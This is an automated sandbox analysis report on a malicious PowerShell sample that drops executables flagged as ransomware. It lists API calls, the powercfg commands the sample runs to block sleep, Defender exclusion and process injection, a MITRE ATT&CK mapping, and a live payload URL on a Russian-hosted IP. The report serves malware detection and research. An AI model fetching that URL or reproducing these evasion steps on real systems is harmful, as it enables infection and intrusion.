        Source: C:\Windows\System32\dialer.exeCode function: 29_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,29_2_0000000140001B54
        Source: C:\Windows\System32\dialer.exeCode function: 29_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,29_2_0000000140001B54
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000001FC5FFA36F0 cpuid 35_2_000001FC5FFA36F0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\dialer.exeCode function: 29_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,29_2_0000000140001B54
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000001FC60387960 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,35_2_000001FC60387960

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Modifies power options to not sleep / hibernate
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API        		1
        DLL Side-Loading        		1
        Abuse Elevation Control Mechanism        		1
        Disable or Modify Tools        		1
        Credential API Hooking        		1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		1
        Data Obfuscation        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts2
        Command and Scripting Interpreter        		1
        Windows Service        		1
        DLL Side-Loading        		1
        Abuse Elevation Control Mechanism        		LSASS Memory2
        File and Directory Discovery        		Remote Desktop Protocol1
        Credential API Hooking        		11
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        Service Execution        		Logon Script (Windows)1
        Access Token Manipulation        		11
        Obfuscated Files or Information        		Security Account Manager123
        System Information Discovery        		SMB/Windows Admin SharesData from Network Shared Drive1
        Encrypted Channel        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts1
        PowerShell        		Login Hook1
        Windows Service        		1
        Software Packing        		NTDS541
        Security Software Discovery        		Distributed Component Object ModelInput Capture1
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script712
        Process Injection        		1
        DLL Side-Loading        		LSA Secrets1
        Process Discovery        		SSHKeylogging11
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
        Rootkit        		Cached Domain Credentials141
        Virtualization/Sandbox Evasion        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
        Masquerading        		DCSync1
        Application Window Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
        Virtualization/Sandbox Evasion        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        Access Token Manipulation        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron712
        Process Injection        		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
        Hidden Files and Directories        		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1577478 Sample: 1.png.ps1 Startdate: 18/12/2024 Architecture: WINDOWS Score: 100 66 Antivirus detection for URL or domain 2->66 68 Multi AV Scanner detection for submitted file 2->68 70 Yara detected Powershell download and execute 2->70 72 11 other signatures 2->72 8 powershell.exe 14 21 2->8         started        13 Mig.exe 2->13         started        process3 dnsIp4 54 176.113.115.178, 49746, 80 SELECTELRU Russian Federation 8->54 50 C:\Users\user\AppData\Roaming\LB31.exe, PE32+ 8->50 dropped 84 Adds a directory exclusion to Windows Defender 8->84 86 Powershell drops PE file 8->86 15 LB31.exe 1 2 8->15         started        19 powershell.exe 22 8->19         started        21 conhost.exe 8->21         started        88 Multi AV Scanner detection for dropped file 13->88 90 Detected unpacking (changes PE section rights) 13->90 92 Tries to detect sandboxes and other dynamic analysis tools (window names) 13->92 94 4 other signatures 13->94 file5 signatures6 process7 file8 52 C:\ProgramData\Mig\Mig.exe, PE32+ 15->52 dropped 56 Multi AV Scanner detection for dropped file 15->56 58 Detected unpacking (changes PE section rights) 15->58 60 Machine Learning detection for dropped file 15->60 64 7 other signatures 15->64 23 dialer.exe 15->23         started        26 powershell.exe 23 15->26         started        28 cmd.exe 1 15->28         started        30 13 other processes 15->30 62 Loading BitLocker PowerShell Module 19->62 signatures9 process10 signatures11 74 Injects code into the Windows Explorer (explorer.exe) 23->74 76 Contains functionality to inject code into remote processes 23->76 78 Writes to foreign memory regions 23->78 82 4 other signatures 23->82 32 winlogon.exe 23->32 injected 46 19 other processes 23->46 80 Loading BitLocker PowerShell Module 26->80 34 conhost.exe 26->34         started        36 conhost.exe 28->36         started        38 wusa.exe 28->38         started        40 conhost.exe 30->40         started        42 conhost.exe 30->42         started        44 conhost.exe 30->44         started        48 10 other processes 30->48 process12

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        1.png.ps121%ReversingLabsScript-BAT.Exploit.Minerva

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Roaming\LB31.exe100%Joe Sandbox ML
        C:\ProgramData\Mig\Mig.exe100%Joe Sandbox ML
        C:\ProgramData\Mig\Mig.exe63%ReversingLabsWin32.Ransomware.Generic
        C:\Users\user\AppData\Roaming\LB31.exe63%ReversingLabsWin32.Ransomware.Generic

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://176.113.115.178/FF/M.png100%Avira URL Cloudmalware
        http://176.113.115.1780%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        s-part-0035.t-0009.t-msedge.net
        		13.107.246.63
        		truefalse
          		high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://176.113.115.178/FF/M.pngtrue
          • Avira URL Cloud: malware
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1691071942.0000014FB37B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1625367670.0000014FA5065000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1691071942.0000014FB3674000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1406794668.0000023110075000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://crl.mpowershell.exe, 00000003.00000002.1415950927.000002316E1FB000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1386534661.0000023100228000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1386534661.0000023100228000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1386534661.0000023100228000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://go.micropowershell.exe, 00000001.00000002.1625367670.0000014FA47E0000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1386534661.0000023100228000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://contoso.com/powershell.exe, 00000003.00000002.1406794668.0000023110075000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1691071942.0000014FB37B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1625367670.0000014FA5065000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1691071942.0000014FB3674000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1406794668.0000023110075000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/Licensepowershell.exe, 00000003.00000002.1406794668.0000023110075000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://crl.micpowershell.exe, 00000003.00000002.1415950927.000002316E1FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/Iconpowershell.exe, 00000003.00000002.1406794668.0000023110075000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://crl.micft.cMicRosofpowershell.exe, 00000003.00000002.1415950927.000002316E1FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://aka.ms/pscore68powershell.exe, 00000001.00000002.1625367670.0000014FA3601000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1386534661.0000023100001000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://176.113.115.178powershell.exe, 00000001.00000002.1625367670.0000014FA47E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1625367670.0000014FA5007000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1625367670.0000014FA3601000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1386534661.0000023100001000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1386534661.0000023100228000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          176.113.115.178
                                          		unknownRussian Federation
                                          		49505SELECTELRUfalse

                                          General Information

                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1577478
                                          Start date and time:2024-12-18 14:07:06 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 11m 16s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:40
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:20
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:1.png.ps1
                                          Detection:MAL
                                          Classification:mal100.spyw.evad.winPS1@56/74@0/1
                                          EGA Information:
                                          • Successful, ratio: 63.6%
                                          HCA Information:
                                          • Successful, ratio: 57%
                                          • Number of executed functions: 65
                                          • Number of non-executed functions: 299
                                          Cookbook Comments:
                                          • Found application associated with file extension: .ps1

                                          Warnings

                                          • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, WmiPrvSE.exe
                                          • Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target powershell.exe, PID 7412 because it is empty
                                          • Execution Graph export aborted for target powershell.exe, PID 8076 because it is empty
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtCreateKey calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • VT rate limit hit for: 1.png.ps1

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          08:08:05API Interceptor76x Sleep call for process: powershell.exe modified
                                          08:09:09API Interceptor129315x Sleep call for process: lsass.exe modified
                                          08:09:09API Interceptor183145x Sleep call for process: winlogon.exe modified
                                          08:09:10API Interceptor2495x Sleep call for process: svchost.exe modified
                                          08:09:12API Interceptor1353x Sleep call for process: dialer.exe modified
                                          08:09:13API Interceptor152135x Sleep call for process: dwm.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          176.113.115.178file.exeGet hashmaliciousUnknownBrowse
                                          • 176.113.115.178/FF/M.png
                                          file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                          • 176.113.115.178/M.png
                                          file.exeGet hashmaliciousUnknownBrowse
                                          • 176.113.115.178/FF/M.png

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          s-part-0035.t-0009.t-msedge.netko.ps1.2.ps1Get hashmaliciousUnknownBrowse
                                          • 13.107.246.63
                                          kjshdgacg18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                          • 13.107.246.63
                                          steel.exe.2.exeGet hashmaliciousSocks5SystemzBrowse
                                          • 13.107.246.63
                                          random.exe.17.exeGet hashmaliciousScreenConnect ToolBrowse
                                          • 13.107.246.63
                                          steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                          • 13.107.246.63
                                          newwork.exe.1.exeGet hashmaliciousSocks5SystemzBrowse
                                          • 13.107.246.63
                                          IW9QNpidAN.exeGet hashmaliciousUnknownBrowse
                                          • 13.107.246.63
                                          T2dvU8f2xg.exeGet hashmaliciousUnknownBrowse
                                          • 13.107.246.63
                                          IW9QNpidAN.exeGet hashmaliciousUnknownBrowse
                                          • 13.107.246.63
                                          cred.dllGet hashmaliciousAmadeyBrowse
                                          • 13.107.246.63

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          SELECTELRUfile.exeGet hashmaliciousUnknownBrowse
                                          • 176.113.115.178
                                          InstallSetup.exeGet hashmaliciousLummaCBrowse
                                          • 176.113.115.19
                                          hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                          • 176.113.115.19
                                          DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                          • 176.113.115.19
                                          he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                          • 176.113.115.19
                                          wN8pQhRNnu.exeGet hashmaliciousLummaCBrowse
                                          • 176.113.115.19
                                          AZCFTWko2q.exeGet hashmaliciousLummaCBrowse
                                          • 176.113.115.19
                                          file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                          • 176.113.115.178
                                          rHrG691f7q.exeGet hashmaliciousLummaCBrowse
                                          • 176.113.115.19
                                          TN78WX7nJU.exeGet hashmaliciousLummaCBrowse
